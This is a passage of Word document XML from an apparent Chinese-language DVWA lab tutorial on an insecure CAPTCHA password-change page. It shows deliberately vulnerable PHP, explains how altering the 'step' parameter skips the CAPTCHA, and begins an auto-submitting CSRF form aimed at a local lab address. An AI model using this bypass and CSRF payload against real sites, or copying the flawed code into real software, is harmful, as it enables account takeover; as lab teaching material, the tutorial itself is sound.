          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $hide_form = </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Get input </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $pass_new  = $_POST[ 'password_new' ]; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $pass_conf = $_POST[ 'password_conf' ]; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Check CAPTCHA from 3rd party </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ], </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $_SERVER[ 'REMOTE_ADDR' ], </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $_POST[ 'recaptcha_challenge_field' ], </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $_POST[ 'recaptcha_response_field' ] ); </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Did the CAPTCHA fail?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resp-&gt;is_valid ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        // What happens </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t> the CAPTCHA was entered incorrectly </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $html     .= "&lt;pre&gt;&lt;br /&gt;The CAPTCHA was incorrect. Please try again.&lt;/pre&gt;"; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $hide_form = </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w: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CAPTCHA was correct. Do both new passwords match?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pass_new == $pass_conf ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>            // Show </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t> stage </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t> the user </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>            echo " </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>                &lt;pre&gt;&lt;br /&gt;You passed the CAPTCHA! Click the button to confirm your changes.&lt;br /&gt;&lt;/pre&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>                &lt;form action=\"#\" method=\"POST\"&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>                    &lt;input type=\"hidden\" name=\"step\" value=\"2\" /&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>                    &lt;input type=\"hidden\" name=\</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"password_new\" value=\"{$pass_new}\" /&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>                    &lt;input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" /&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>                    &lt;input type=\"submit\" name=\"Change\" value=\"Change\" /&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>                &lt;/form&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Both new passwords </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t> match. </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>            $html     .= "&lt;pre&gt;Both passwords must match.&lt;/pre&gt;"; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>            $hide_form = </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        }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POST[ 'Change' ] ) &amp;&amp; ( $_POST[ 'step' ] == '2' ) ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Hide the CAPTCHA form </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $hide_form = </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Get input </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $pass_new  = $_POST[ 'password_new' ]; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    $pass_conf = $_POST[ 'password_conf' ]; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>    // Check to see </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t> both password match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pass_new == $pass_conf ) { </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        // They </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>! </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $pass_new = mysql_real_escape_string( $pass_new ); </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $pass_new = md5( $pass_new ); </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        // Update database </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $result = mysql_query( $insert ) </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t> die( '&lt;pre&gt;' . mysql_error() . '&lt;/pre&gt;'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the </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t> user </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        echo "&lt;pre&gt;Password Chang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Issue with the passwords matching </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        echo "&lt;pre&gt;Passwords did not match.&lt;/pre&gt;"; </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>        $hide_form = </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>;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r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>} </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:br/>
        <w:t>?&gt;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 xml:space="preserve">可以看到，服务器将改密操作分成了两步，第一步检查用户输入的验证码，验证通过后，服务器返回表单，第二步客户端提交post请求，服务器完成更改密码的操作。但是，这其中存在明显的逻辑漏洞，服务器仅仅通过检查Change、step 参数来判断用户是否已经输入了正确的验证码。 </w:t>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1.通过构造参数绕过验证过程的第一步</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输入密码，点击Change按钮，抓包：</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6870200" wp14:editId="3464A992">
            <wp:extent cx="5098212" cy="3260630"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="89" name="图片 89" descr="1.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360" cy="326072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ps:因为没有翻墙，所以没能成功显示验证码，发送的请求包中也就没有recaptcha_challenge_field、recaptcha_response_field两个参数）</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更改step参数绕过验证码：</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4CA0B5A" wp14:editId="26222FD9">
            <wp:extent cx="5296619" cy="3683479"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="88" name="图片 88" descr="1.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8714" cy="369189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修改密码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8925B7F" wp14:editId="71CCCB6F">
            <wp:extent cx="4856672" cy="2303078"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="87" name="图片 87" descr="1.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p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6813" cy="230314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2.由于没有任何的防CSRF机制，我们可以轻易地构造攻击页面，页面代码如下（详见</w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>CSRF模块的教程</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）。</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lt;html&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lt;body onload="document.getElementById('transfer').submit()"&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lt;div&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lt;form method="POST" id="transfer" action="</w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidRPr="009655A2">
          <w:rPr>
            <w:rFonts w:cs="Consolas"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
          </w:rPr>
          <w:t>http://192.168.153.130/dvwa/vulnerabilities/captcha/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve">"&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r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">&lt;input type="hidden" name="password_new" </w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
